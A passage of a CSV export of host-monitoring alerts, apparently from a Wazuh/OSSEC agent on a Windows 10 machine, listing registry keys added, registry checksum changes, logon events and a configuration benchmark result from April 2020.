'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicesFlowUserSvc_2b7cd\Security' was added. +" +"Apr 4, 2020 @ 15:20:46.013",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicePickerUserSvc_2b7cd' was added. +" +"Apr 4, 2020 @ 15:20:45.997",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicePickerUserSvc_2b7cd\Security' was added. +" +"Apr 4, 2020 @ 15:20:45.748",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DeviceAssociationBrokerSvc_2b7cd' was added. +" +"Apr 4, 2020 @ 15:20:45.732",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DeviceAssociationBrokerSvc_2b7cd\Security' was added. +" +"Apr 4, 2020 @ 15:20:45.184",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CredentialEnrollmentManagerUserSvc_2b7cd' was added. +" +"Apr 4, 2020 @ 15:20:45.169",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CredentialEnrollmentManagerUserSvc_2b7cd\Security' was added. +" +"Apr 4, 2020 @ 15:20:44.982",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\ConsentUxUserSvc_2b7cd' was added. +" +"Apr 4, 2020 @ 15:20:44.966",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\ConsentUxUserSvc_2b7cd\Security' was added. +" +"Apr 4, 2020 @ 15:20:44.825",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CompositeBus\Parameters\Wdf' checksum changed. +Old md5sum was: '1935e9f379e872308a49f6d8f4863bc5' +New md5sum is : 'e9d96c4f08fa655c42db7df4a5acb08c' +Old sha1sum was: 'c9ae2d75231460ef4dab9ce1033d917d8630f141' +New sha1sum is : '8e7fbf7b3eb684559c3317fee8a56fc267f4a434' +" +"Apr 4, 2020 @ 15:20:43.606",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CDPUserSvc_2b7cd' was added. +" +"Apr 4, 2020 @ 15:20:43.591",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CDPUserSvc_2b7cd\Security' was added. +" +"Apr 4, 2020 @ 15:20:43.424",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\cbdhsvc_2b7cd' was added. +" +"Apr 4, 2020 @ 15:20:43.389",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\cbdhsvc_2b7cd\Security' was added. +" +"Apr 4, 2020 @ 15:20:43.252",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CaptureService_2b7cd' was added. +" +"Apr 4, 2020 @ 15:20:43.232",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CaptureService_2b7cd\Security' was added. +" +"Apr 4, 2020 @ 15:20:40.966",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_2b7cd' was added. +" +"Apr 4, 2020 @ 15:20:40.937",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_2b7cd\TriggerInfo\4' was added. +" +"Apr 4, 2020 @ 15:20:40.905",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_2b7cd\TriggerInfo\3' was added. +" +"Apr 4, 2020 @ 15:20:40.888",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_2b7cd\TriggerInfo\2' was added. +" +"Apr 4, 2020 @ 15:20:40.873",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_2b7cd\TriggerInfo\1' was added. +" +"Apr 4, 2020 @ 15:20:40.858",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_2b7cd\TriggerInfo\0' was added. +" +"Apr 4, 2020 @ 15:20:40.841",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_2b7cd\Security' was added. +" +"Apr 4, 2020 @ 15:20:39.952",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BcastDVRUserService_2b7cd' was added. +" +"Apr 4, 2020 @ 15:20:39.935",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BcastDVRUserService_2b7cd\Security' was added. +" +"Apr 4, 2020 @ 15:20:39.669",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-90-0-2' checksum changed. +Old md5sum was: 'cc131ed9046fdc4473415eda7dfda2bd' +New md5sum is : '3c103fb65c38ddc72e97c82b21c94a74' +Old sha1sum was: '9384caab289e45a45d742e5aa407d878d3097b5a' +New sha1sum is : 'd5ea3065712606e0ca494a7501b14f02c2efff00' +" +"Apr 4, 2020 @ 15:20:39.656",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-90-0-1' checksum changed. +Old md5sum was: '34d7c82c5e420ab011490952e3ec24d9' +New md5sum is : 'c27dbca062ca06a70a39612561b7c82d' +Old sha1sum was: '88ab8d62bed217dca932dc4cb700cedfda2782c0' +New sha1sum is : 'd83d981337b440cae6327e24c113e9d8524a5fce' +" +"Apr 4, 2020 @ 15:20:39.638",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: 'f99554cc3af126a43609b522296e3789' +New md5sum is : '83f33b7a512d7bb9d2926bf38e588f68' +Old sha1sum was: '79e65a0a0aa4ac842cd2db7310b55b8ce48384cf' +New sha1sum is : '0b27022fba35b561c54e96e35d085c2fe2815c04' +" +"Apr 4, 2020 @ 15:20:39.622",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-438079597-2123118846-2669748851-1000' checksum changed. +Old md5sum was: '3de12a32ccbd37717a2ea08417d7fddc' +New md5sum is : '21c20e9307ad43dbf66b7a80761f0ae8' +Old sha1sum was: 'b7451a316325cba8f20dce525a6e35a14bc91803' +New sha1sum is : '9f188f582f1b626cd2abfc5045f67af326f52d7b' +" +"Apr 4, 2020 @ 15:20:39.606",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-18' checksum changed. +Old md5sum was: '519c95147a332fa984f21fa352a3e6fd' +New md5sum is : '21f6133d49aa702ddb2203de2145bce7' +Old sha1sum was: '22be62c29307035d650978bc7ed1fcc26546a41e' +New sha1sum is : '1fe6493056f2b0c366fdb06a6d474200ee7f3874' +" +"Apr 4, 2020 @ 15:20:37.326",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\AarSvc_2b7cd' was added. +" +"Apr 4, 2020 @ 15:20:37.311",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\AarSvc_2b7cd\Security' was added. +" +"Apr 4, 2020 @ 15:20:22.856",5,"License Activation (slui.exe) failed", +"Apr 4, 2020 @ 15:20:17.936",3,"Windows Logon Success", +"Apr 4, 2020 @ 15:20:15.529",3,"Windows Logon Success", +"Apr 4, 2020 @ 15:20:15.475",3,"Windows Logon Success", +"Apr 4, 2020 @ 15:20:15.437",5,"System time changed", +"Apr 4, 2020 @ 15:20:15.423",5,"System time changed", +"Apr 4, 2020 @ 15:19:44.637",3,"Software Protection service scheduled successfully", +"Apr 4, 2020 @ 15:19:26.668",3,"Windows User Logoff", +"Apr 4, 2020 @ 15:19:26.644",3,"Windows User Logoff", +"Apr 4, 2020 @ 15:19:26.576",3,"Windows Workstation Logon Success", +"Apr 4, 2020 @ 15:19:26.558",3,"Windows Workstation Logon Success", +"Apr 4, 2020 @ 15:19:23.418",3,"Windows Logon Success", +"Apr 4, 2020 @ 15:19:14.409",5,"SCA summary: Benchmark for Windows audit: Score less than 80% (66)", +"Apr 4, 2020 @ 15:19:10.426",5,"License Activation (slui.exe) failed", +"Apr 4, 2020 @ 15:19:07.046",3,"Windows Logon Success", +"Apr 4, 2020 @ 15:19:06.952",3,"Windows Logon Success", +"Apr 4, 2020 @ 15:19:06.838",3,"The Windows Search Service started", +"Apr 4, 2020 @ 15:19:06.761",9,"Benchmark for Windows audit: Ensure 'MSS: (AutoAdminLogon) Enable Automatic Logon (not recommended)' is set to 'Disabled': Status changed from 'not applicable' to failed", +"Apr 4, 2020 @ 15:19:06.608",3,"The database engine attached a database", +"Apr 4, 2020 @ 15:19:06.527",3,"The database engine is starting a new instance", +"Apr 4, 2020 @ 15:19:04.263",5,"SessionEnv was unavailable to handle a notification event", +"Apr 4, 2020 @ 15:19:03.952",3,"Windows Workstation Logon Success", +"Apr 4, 2020 @ 15:19:03.942",3,"Windows Workstation Logon Success", +"Apr 4, 2020 @ 15:19:03.308",7,"SessionEnv was unavailable to handle a critical notification event", +"Apr 4, 2020 @ 15:19:01.094",3,"Windows Logon Success", +"Apr 4, 2020 @ 15:18:59.122",3,"Ossec agent started.","ossec: Agent started: 'windows-10->any'." +"Apr 4, 2020 @ 15:18:09.641",3,"Windows User Logoff", +"Apr 4, 2020 @ 15:18:09.601",5,"Windows System error event", +"Apr 4, 2020 @ 15:18:08.924",5,"SessionEnv was unavailable to handle a notification event", +"Apr 4, 2020 @ 15:18:08.908",5,"WSearch was unavailable to handle a notification event", +"Apr 4, 2020 @ 15:17:57.592",3,"Software Protection service scheduled successfully", +"Apr 4, 2020 @ 15:17:20.115",3,"Software Protection service scheduled successfully", +"Apr 4, 2020 @ 15:16:38.823",3,"Proof of Purchase installed successfully", +"Apr 4, 2020 @ 15:15:12.924",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon' checksum changed. +Old md5sum was: 'd2afe6cd3b0d76b57e79a6a2e287c7ea' +New md5sum is : 'a42aba8bfc3fa20348a9721ae0ca3460' +Old sha1sum was: 'e025dd55baf1c0980b048620023acc71bdbf6c85' +New sha1sum is : 'e9eb87c9f46d8fb813cc6fdd1b8c16b59b46ad4f' +" +"Apr 4, 2020 @ 15:15:12.909",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\VolatileUserMgrKey\1\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: '5c846d33afca4692d83a3ab365ad6442' +New md5sum is : 'b0509f8ae7589a36b0e922ea55370a2a' +Old sha1sum was: '084d92d987ccfb645a193f074fd7a6b45d5fd358' +New sha1sum is : '7c173f25809414b691ff85859d444a8615734f04' +" +"Apr 4, 2020 @ 15:15:11.277",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System' checksum changed. +Old md5sum was: 'c8ac4b841c008e3ac0a8a192544d37c5' +New md5sum is : '401e534489c4201969c73e3417a991dd' +Old sha1sum was: 'e0866d0f9ff0c9fa64a69a11948050e82fbb6b83' +New sha1sum is : 'e32cf50732d765aaecb1f3cf7b634619089e4aaa' +" +"Apr 4, 2020 @ 15:15:10.409",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System' checksum changed. +Old md5sum was: 'c8ac4b841c008e3ac0a8a192544d37c5' +New md5sum is : '401e534489c4201969c73e3417a991dd' +Old sha1sum was: 'e0866d0f9ff0c9fa64a69a11948050e82fbb6b83' +New sha1sum is : 'e32cf50732d765aaecb1f3cf7b634619089e4aaa' +" +"Apr 4, 2020 @ 15:15:08.863",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\WpnUserService_30ad3' was added. +" +"Apr 4, 2020 @ 15:15:08.846",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\WpnUserService_30ad3\Security' was added. +" +"Apr 4, 2020 @ 15:14:59.799",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\TimeProviders\NtpClient' checksum changed. +Old md5sum was: 'b4226e31c64aa3415f26064e055e68c3' +New md5sum is : '0537eac2a8f888ccfe2ff7c9cb88eba4' +Old sha1sum was: '46945000f0220428ef57f13d54c8a2ceaa305687' +New sha1sum is : '011c9cae6591b6ed5bc8cf0ad3eebcd91c70322c' +" +"Apr 4, 2020 @ 15:14:59.737",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits' checksum changed. +Old md5sum was: 'c3d642ddecf73503974d3d9b152c6526' +New md5sum is : 'df9be7629f6b4bb426436fddfdda3e00' +Old sha1sum was: '7ecbc5c7a471777187b03d69d68194b23951185f' +New sha1sum is : '27944b26d8cfd2e43728eb7197de1c8f824a233d' +" +"Apr 4, 2020 @ 15:14:59.721",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime' checksum changed. +Old md5sum was: 'cd94995ffa04df33ca0e72974862aeae' +New md5sum is : 'eef4559e7fd1bceae06925bdc22dd84b' +Old sha1sum was: '60779cbd090ab8ef17ba7b628c70e7b97dcf07bf' +New sha1sum is : '5e9ea0459e03ac8fca6d6a6e915584a6d0419d0a' +" +"Apr 4, 2020 @ 15:14:59.018",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VSS\Diag\VolSnap' checksum changed. +Old md5sum was: '716f7304e80f8c3f1b5b2453fe30ef3e' +New md5sum is : '70803ff74c6137bb9c30faef6663c67e' +Old sha1sum was: 'c28f4f92f94fb258c0938828b2eed5ab28a74bbc' +New sha1sum is : '6fcc6a87284459c8396289b99fe1d19b455650f3' +" +"Apr 4, 2020 @ 15:14:57.612",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Vid\Parameters\Wdf' checksum changed. +Old md5sum was: 'b10575c071885e0e95058e3339a1667d' +New md5sum is : '1935e9f379e872308a49f6d8f4863bc5' +Old sha1sum was: '5c843b32b91998ce3cb955104fd52f7bf07e6d6d' +New sha1sum is : 'c9ae2d75231460ef4dab9ce1033d917d8630f141' +" +"Apr 4, 2020 @ 15:14:57.362",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\vdrvroot\Parameters\Wdf' checksum changed. +Old md5sum was: '1218d71e4c260ad33840e156ba1916d6' +New md5sum is : '96f3da64bf19dc1bd781394ccce1fbeb' +Old sha1sum was: '73ce2ff89a16e1dbd217e9158794b46d458cc3b7' +New sha1sum is : 'd27fb1d8e05747b9210064f64aa3c8d84f5e96a6' +" +"Apr 4, 2020 @ 15:14:56.752",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UserDataSvc_30ad3' was added. +" +"Apr 4, 2020 @ 15:14:56.736",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UserDataSvc_30ad3\Security' was added. +" +"Apr 4, 2020 @ 15:14:56.611",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\USBXHCI\Parameters\Wdf' checksum changed. +Old md5sum was: '0147defdd6e3cc2241869f6366d80d6e' +New md5sum is : '44e16df733261010319c89f3decf1694' +Old sha1sum was: '8338c694e073f86e5cd3b378ca03e78c4d475c62' +New sha1sum is : 'b18203806fe0dae10954bb7bb39c25b8b0d4e978' +" +"Apr 4, 2020 @ 15:14:56.424",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\USBHUB3\Parameters\Wdf' checksum changed. +Old md5sum was: 'ea3a5186b08026d706fec82e92df07c7' +New md5sum is : '4559d805700630cd4bcb2f3aec755c25' +Old sha1sum was: 'a4d376f4accdc1f57b6f2f9301859a9404868adf' +New sha1sum is : '058f1b6c28e41a92ba1b747585b9ac8a56baec34' +" +"Apr 4, 2020 @ 15:14:55.955",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UnistoreSvc_30ad3' was added. +" +"Apr 4, 2020 @ 15:14:55.940",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UnistoreSvc_30ad3\Security' was added. +" +"Apr 4, 2020 @ 15:14:55.252",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\umbus\Parameters\Wdf' checksum changed. +Old md5sum was: 'b10575c071885e0e95058e3339a1667d' +New md5sum is : '1935e9f379e872308a49f6d8f4863bc5' +Old sha1sum was: '5c843b32b91998ce3cb955104fd52f7bf07e6d6d' +New sha1sum is : 'c9ae2d75231460ef4dab9ce1033d917d8630f141' +" +"Apr 4, 2020 @ 15:14:53.314",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{10cb9356-9dd8-4d03-959f-611e879a11a6}' checksum changed. +Old md5sum was: 'ccebd772ef698e648fbc3c0804db213c' +New md5sum is : '4c3f002c2542e6c47bd1e5d5526ad531' +Old sha1sum was: '4aad002a9a35fbf136143ed1137e315f8d5f2eaf' +New sha1sum is : '00ea6b590c5fa5bcac5c671a151c31127ac60089' +" +"Apr 4, 2020 @ 15:14:49.846",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\srvnet\Parameters' checksum changed. +Old md5sum was: 'b7992042185fc6ec85e366e31893c993' +New md5sum is : '5d8658099109c05a39f0550c9fe2078d' +Old sha1sum was: '7da8cd2c012f8b55d1d5ce23f9ccdf45379c55ad' +New sha1sum is : 'bd60f0594b3758e2b86084c77d5b75b32d4df8b1' +" +"Apr 4, 2020 @ 15:14:48.126",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\AppIso\FirewallRules' checksum changed. +Old md5sum was: '52fb5d0b7da48f73ac3fbe434dfe1f0a' +New md5sum is : '4ec372e5c956917c47740315de22f258' +Old sha1sum was: 'de2f6be9dbec4b2bb8df4ca2490e582bcd21add6' +New sha1sum is : '1ebd67340dfc660448dc620eb68e7fb4cf9c565a' +" +"Apr 4, 2020 @ 15:14:47.501",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules' checksum changed. +Old md5sum was: 'b37d88849329a851787efa3b6513665f' +New md5sum is : 'e25d33057cf71b330830d5e95b124fe5' +Old sha1sum was: 'c9c09efe3bf177be5acc55723783810cf39fbd8a' +New sha1sum is : '624751317ab817d1c615abbd24c010d370e34268' +" +"Apr 4, 2020 @ 15:14:47.455",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Epoch2' checksum changed. +Old md5sum was: 'dc9f9e3fba782230828c1350ebdd6327' +New md5sum is : '06e3a0893e8471fe1ad4937da2a83d5f' +Old sha1sum was: 'df82c4e7b328c25ab2a829fbb36079904d347a00' +New sha1sum is : '0b07d04f35b9382f85cdc6152e8d39398c1f055b' +" +"Apr 4, 2020 @ 15:14:47.439",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Epoch' checksum changed. +Old md5sum was: '3e5e3c422cb01f5f45c7825a34e33ae9' +New md5sum is : '5fb1e28e9e1ea88c6ada6523c4164966' +Old sha1sum was: '9091ccb7071ec177f9a4162ad1aa86bdecdd70c3' +New sha1sum is : 'd1f49ffeb1bbc4493fe5bce52eaf75cccf81560c' +" +"Apr 4, 2020 @ 15:14:43.126",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\rdyboost\Diagnostics' checksum changed. +Old md5sum was: 'fa742e572a0ab3ad838cdc36f548a2e7' +New md5sum is : 'a790734f197ecec9285de0c7c3ee54a1' +Old sha1sum was: '4bd92b98f3142283ddbfa0b8875cc0e446f8a651' +New sha1sum is : '2a056b4354493d8181a6997a08b72094f1778f22' +" +"Apr 4, 2020 @ 15:14:40.965",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PrintWorkflowUserSvc_30ad3' was added. +" +"Apr 4, 2020 @ 15:14:40.964",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PrintWorkflowUserSvc_30ad3\Security' was added. +" +"Apr 4, 2020 @ 15:14:38.517",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_30ad3' was added. +" +"Apr 4, 2020 @ 15:14:38.501",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_30ad3\Security' was added. +" +"Apr 4, 2020 @ 15:14:36.626",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\OneSyncSvc_30ad3' was added. +" +"Apr 4, 2020 @ 15:14:36.610",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\OneSyncSvc_30ad3\Security' was added. +" +"Apr 4, 2020 @ 15:14:33.876",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NdisVirtualBus\Parameters\Wdf' checksum changed. +Old md5sum was: '4b892ced83fc54554ffca5ac0787d33d' +New md5sum is : '3afaf17706b569cfc181c32e11e3e1e3' +Old sha1sum was: 'fec8c41e2f6734e8e932e3ca7cd14aa68a2d12a9' +New sha1sum is : '4d4da11dce9a318cf536df3a5f5d41a6c41f70dd' +" +"Apr 4, 2020 @ 15:14:32.580",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\mssmbios\Data' checksum changed. +Old md5sum was: '56e9f0a7add3da7f007b812f71fed075' +New md5sum is : '1e6e38e0129cb1178036ce2d2de63896' +Old sha1sum was: 'e34bbe63c9ca7e70f4e38fca2b5911ca2863966f' +New sha1sum is : 'c69f3fa6abcfb59085cdd1e6fe3925b88bf1eb8a' +" +"Apr 4, 2020 @ 15:14:32.329",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\msisadrv\Parameters\Wdf' checksum changed. +Old md5sum was: '1d734d0614a7f9396fa5bea37be23603' +New md5sum is : '582b366b698c74fe5d3e40a47e1b8010' +Old sha1sum was: 'c5d286f501575f57fe00f3d3f030a51179901720' +New sha1sum is : '8961c68f641a2a7819a49e53b3c6e5e24bcee551' +" +"Apr 4, 2020 @ 15:14:31.376",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\monitor\Parameters\Wdf' checksum changed. +Old md5sum was: '2b11f9b94557bbaa06c68efc5f79ceb1' +New md5sum is : '1f292403ac7b268e3b11f111ded67e2c' +Old sha1sum was: 'f5d52d3a7f4d9b26ce2cb09d87c3a9d9f48455ed' +New sha1sum is : 'c336ebf7d883f128c8920b416859ef494e2e018c' +" +"Apr 4, 2020 @ 15:14:31.253",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_30ad3' was added. +" +"Apr 4, 2020 @ 15:14:31.235",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_30ad3\TriggerInfo\0' was added. +" +"Apr 4, 2020 @ 15:14:31.220",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_30ad3\Security' was added. +" +"Apr 4, 2020 @ 15:14:27.329",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanmanServer\Parameters' checksum changed. +Old md5sum was: 'ec73eedc0675f39acf932c36452ef49a' +New md5sum is : '1e18b407d6fa2ba2ca94f603ba4f26b4' +Old sha1sum was: '6573df49eab79fe379b169a6836058b37e7978c7' +New sha1sum is : '0df5dd168081c6678164f4e60dce87117ddfa87e' +" +"Apr 4, 2020 @ 15:14:25.907",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\intelppm\Parameters\Wdf' checksum changed. +Old md5sum was: '4b892ced83fc54554ffca5ac0787d33d' +New md5sum is : '3afaf17706b569cfc181c32e11e3e1e3' +Old sha1sum was: 'fec8c41e2f6734e8e932e3ca7cd14aa68a2d12a9' +New sha1sum is : '4d4da11dce9a318cf536df3a5f5d41a6c41f70dd' +" +"Apr 4, 2020 @ 15:14:23.281",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\HDAudBus\Parameters\Wdf' checksum changed. +Old md5sum was: 'cf1c968e34c5937dfe0a68b65d9ceb55' +New md5sum is : 'da7d5ec8cdd7285f49105e5efe9c6bb8' +Old sha1sum was: '175f379d4d248570ffb2597259322ff1e0af9716' +New sha1sum is : 'eb0efa8d18c93a3996afdf9ff649e81a5d40b033' +" +"Apr 4, 2020 @ 15:14:22.564",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\gencounter\Parameters\Wdf' checksum changed. +Old md5sum was: '4b892ced83fc54554ffca5ac0787d33d' +New md5sum is : '3afaf17706b569cfc181c32e11e3e1e3' +Old sha1sum was: 'fec8c41e2f6734e8e932e3ca7cd14aa68a2d12a9' +New sha1sum is : '4d4da11dce9a318cf536df3a5f5d41a6c41f70dd' +" +"Apr 4, 2020 @ 15:14:21.437",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\FDResPub\ServiceData' checksum changed. +Old md5sum was: 'ae9643074ec7a4ef81bb63a482e527c9' +New md5sum is : '180219dd3d5cd4e9bd4f437e6b975dc1' +Old sha1sum was: 'bb90e1460f2a74046f7b573529a69b9faa6b3a52' +New sha1sum is : 'c8b4a3f4d649c55502e3e419db9da373945302cb' +" +"Apr 4, 2020 @ 15:14:11.469",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\EventLog\State' checksum changed. +Old md5sum was: 'bc26ea2b86aac0a94081e153d9d0ff1b' +New md5sum is : 'c5c6ddae9a35331147842cd5448debe5' +Old sha1sum was: 'f68b300b77ea5ebb731ef5b341d03cb634f764b8' +New sha1sum is : 'cba0805b3a87df3e8916c67705d47828f0618ed0' +" +"Apr 4, 2020 @ 15:14:05.016",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Dnscache\Parameters\Probe\{a957488a-bcc3-4136-8332-2c86058caa77}' checksum changed. +Old md5sum was: '53e3e466da95a82ede12fa122585fa45' +New md5sum is : '385c9184ac544829488be8ce5b5671ff' +Old sha1sum was: '06a8de5ad522c838b0960f7fae2ec320337f41a4' +New sha1sum is : 'fa617e764e334ea237bea1af00d403f462f50d6f' +" +"Apr 4, 2020 @ 15:14:03.710",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicesFlowUserSvc_30ad3' was added. +" +"Apr 4, 2020 @ 15:14:03.676",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicesFlowUserSvc_30ad3\Security' was added. +" +"Apr 4, 2020 @ 15:14:03.610",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicePickerUserSvc_30ad3' was added. +" +"Apr 4, 2020 @ 15:14:03.593",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicePickerUserSvc_30ad3\Security' was added. +" +"Apr 4, 2020 @ 15:14:03.328",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DeviceAssociationBrokerSvc_30ad3' was added. +" +"Apr 4, 2020 @ 15:14:03.313",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DeviceAssociationBrokerSvc_30ad3\Security' was added. +" +"Apr 4, 2020 @ 15:14:02.688",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CredentialEnrollmentManagerUserSvc_30ad3' was added. +" +"Apr 4, 2020 @ 15:14:02.672",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CredentialEnrollmentManagerUserSvc_30ad3\Security' was added. +" +"Apr 4, 2020 @ 15:14:02.547",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\ConsentUxUserSvc_30ad3' was added. +" +"Apr 4, 2020 @ 15:14:02.531",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\ConsentUxUserSvc_30ad3\Security' was added. +" +"Apr 4, 2020 @ 15:14:02.359",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CompositeBus\Parameters\Wdf' checksum changed. +Old md5sum was: 'b10575c071885e0e95058e3339a1667d' +New md5sum is : 